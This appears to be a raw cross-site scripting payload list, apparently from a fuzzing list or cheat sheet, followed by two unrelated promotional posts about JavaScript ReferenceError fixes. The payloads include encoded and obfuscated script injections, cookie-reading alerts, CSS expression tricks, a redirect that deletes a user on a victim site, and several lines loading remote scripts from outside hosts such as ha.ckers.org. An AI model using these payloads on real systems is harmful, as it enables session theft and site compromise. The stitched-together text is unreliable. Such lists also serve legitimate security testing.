ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
>alert(document.cookie)
>alert(document.cookie)
><alert(document.cookie);//<
fooalert(document.cookie)
<script>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)%3E
; alert(document.cookie); var foo=
foo\; alert(document.cookie);//;
alert(document.cookie)
alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`">javascript:alert(1)
'`">javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)</script\x0D
javascript:alert(1)</script\x0A
javascript:alert(1)</script\x0B
javascript:alert(1)
--> -->
-->
-->
-->
`"'>
"'`>a='hello\x27;javascript:alert(1)//';
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */
</style\x3E
</style\x0D
</style\x09
</style\x20
</style\x0A
"'`>ABCDEF
"'`>ABCDEF
if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
'`">javascript:alert(1)
'`">javascript:alert(1)
"'`>
"'`>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
javascript:alert(1)
<video poster=javascript:javascript:alert(1)//
...............
X
X
CLICKME CLICKME
<img src="
<img src="
javascript:alert(1)
<b alert(1)0
document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;
x
javascript:alert(1)">
javascript:alert(1)">
javascript:alert(1)">
javascript:alert(1)'>">
javascript:alert(1)">
javascript:alert(1)">
d.innerHTML=d.innerHTML
<img src="x` `javascript:alert(1)"` `>
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
*[{}@import'%(css)s?]X
XXX
XXX
*{x:expression(javascript:alert(1))}
X
X with(document.getElementById("d"))innerHTML=innerHTML
X
X
XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&
¼script¾javascript:alert(1)¼/script¾
X
1
1
x
%(payload)s
javascript:alert(1)
<SCRIPT SRC=%(jscript)s?
<%(payload)s//<
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
@import'%(css)s';
<META HTTP-EQUIV="Link" Content="; REL=stylesheet">
li {list-style-image: url("javascript:javascript:alert(1)");}XSS
javascript:alert(1);
.XSS{background-image:url("javascript:javascript:alert(1)");}
BODY{background:url("javascript:javascript:alert(1)")}
XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X
@import'%(css)s';
a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
&&javascript:alert(1)&&;&&
javascript:alert(1);
<![CDATA[<IMG SRC="javas]]]]
<embed width=500 height=500 code="data:text/html,%(payload)s">
">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
>">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")">
perl -e 'print "";' > out
<alert("XSS");//<
<SCRIPT SRC=http://ha.ckers.org/xss.js?
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
@import'http://ha.ckers.org/xss.css';
<META HTTP-EQUIV="Link" Content="; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
<? echo('alert("XSS")'); ?>
Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="http://ha.ckers.org/xss.js">
" SRC="http://ha.ckers.org/xss.js">
" '' SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
'>" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/*%00*/alert(1)/*%00*/</script /*%00*/
">%00
<iframe/src="data:text/html,">
</script
<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
http://www.googlealert(document.location)</script
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/</script :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
////
/*iframe/src*/<iframe/src="
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
<%
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<iframe/src=javascript:confirm(1)
<input type="text" value=`` X
www.alert(1)</script .com
alert(1)
MsgBox+1
<a href="data:text/html;base64_,">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);</script
alert(1)
alert(1) </script 1=2
style="x:">
<--` --!>
x
">
CLICKME
ReferenceError: fetch is not defined
How to completely fix the error “ReferenceError: fetch is not defined”. Please refer to the solution in our article.
#itprospt #reference #fetch #solve #javascript
itprospt.com/fix-the-problem-referenceerror-fetch-is-not-...
“Babel ReferenceError: regeneratorRuntime is not defined“
How Do You Solve This Error “Babel ReferenceError: Regeneratorruntime Is Not Defined”?
#itprospt #referenceerror #regeneratorruntime #babel #solve
itprospt.com/this-error-babel-referenceerror-regeneratorr...